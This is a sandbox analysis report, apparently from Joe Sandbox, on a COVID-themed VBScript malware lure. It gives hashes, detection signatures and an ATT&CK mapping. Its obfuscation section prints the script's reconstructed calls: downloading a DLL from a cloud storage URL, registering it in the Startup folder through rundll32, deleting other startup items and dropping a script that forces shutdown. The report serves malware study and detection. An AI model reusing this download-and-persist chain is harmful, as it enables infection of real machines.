Loading ...

Play interactive tourEdit tour

Analysis Report Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs

Overview

General Information

Sample Name:Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs
Analysis ID:338693
MD5:462d612fcc6ce92ac4d1b58a27e4ecac
SHA1:405633f2a4fe5b859ea9331a2276ebd494d39aa4
SHA256:2bedcf94c9aea7b126f70169728f38678d615cdc26991c3b30628912eb2766d9

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Detected VMProtect packer
Machine Learning detection for dropped file
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Windows Shell Script Host drops VBS files
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Stores files to the Windows start menu directory

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5336 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dllAvira: detection malicious, Label: TR/Black.Gen2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dllAvira: detection malicious, Label: TR/Black.Gen2
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dllJoe Sandbox ML: detected
Source: Binary string: scrrun.pdb source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp
Source: Binary string: wscript.pdb source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdbUGP source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp

Networking:

barindex
Potential malicious VBS script found (has network functionality)Show sources
Source: Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody
Source: Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2
Source: Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody
Source: Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: wscript.exe, 00000001.00000002.607520766.000001A4B429F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: wscript.exe, 00000001.00000002.607260420.000001A4B426B000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/
Source: wscript.exe, 00000001.00000002.607260420.000001A4B426B000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/7
Source: wscript.exe, wscript.exe, 00000001.00000002.606699710.000001A4B3FCD000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.606781779.000001A4B4108000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip
Source: wscript.exe, wscript.exe, 00000001.00000002.606699710.000001A4B3FCD000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.607607145.000001A4B42AE000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll
Source: wscript.exe, 00000001.00000002.602734156.000001A4B231C000.00000004.00000020.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllenu

System Summary:

barindex
Detected VMProtect packerShow sources
Source: P-16-5[1].dll.1.drStatic PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbsInitial sample: Strings found which are bigger than 50
Source: P-16-5[1].dll.1.drStatic PE information: Number of sections : 12 > 10
Source: classification engineClassification label: mal92.evad.winVBS@1/6@0/2
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbsJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs'
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: wscript.exe, 00000001.00000002.609198281.000001A4B65ED000.00000004.00000001.sdmpBinary or memory string: select * from Win32_OperatingSystem where Primary=true");
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Binary string: scrrun.pdb source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp
Source: Binary string: wscript.pdb source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdbUGP source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbs", "true");ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\44788286328315");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\puyfmugprn .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll SFsb9V5o7LTfxDWhDoh");IWshShortcut.WindowStyle("1");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\puyfmugprn");IWshShortcut.Save();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbs");ITextStream.ReadAll();ITextStream.Close();IHost.Sleep("300000");ISWbemServicesEx.ExecQuery("select * from Win32_OperatingSystem where Primary=true");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01000001("6")
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: P-16-5[1].dll.1.drStatic PE information: section name: .didata
Source: P-16-5[1].dll.1.drStatic PE information: section name: .vmp0
Source: P-16-5[1].dll.1.drStatic PE information: section name: .vmp1

Persistence and Installation Behavior:

barindex
Windows Shell Script Host drops VBS filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dllJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\puyfmugprn .lnkJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\puyfmugprn .lnkJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Potential evasive VBS script found (sleep loop)Show sources
Source: Initial fileInitial file: CRZSCDGSMROZDYBDQERIQAJU.Write "WScript.Sleep(300000)" & vbCrLf
Source: C:\Windows\System32\wscript.exeDropped file: WScript.Sleep(300000)Jump to dropped file
Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dllJump to dropped file
Source: wscript.exe, 00000001.00000002.608290065.000001A4B4760000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000001.00000002.607061788.000001A4B425B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000002.608290065.000001A4B4760000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000001.00000002.608290065.000001A4B4760000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000001.00000002.607061788.000001A4B425B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
Source: wscript.exe, 00000001.00000002.608290065.000001A4B4760000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: P-16-5[1].dll.1.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 74.125.143.128 187Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting421Startup Items1Startup Items1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution1Registry Run Keys / Startup Folder2Process Injection1Virtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsPowerShell1Logon Script (Windows)Registry Run Keys / Startup Folder2Process Injection1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting421NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.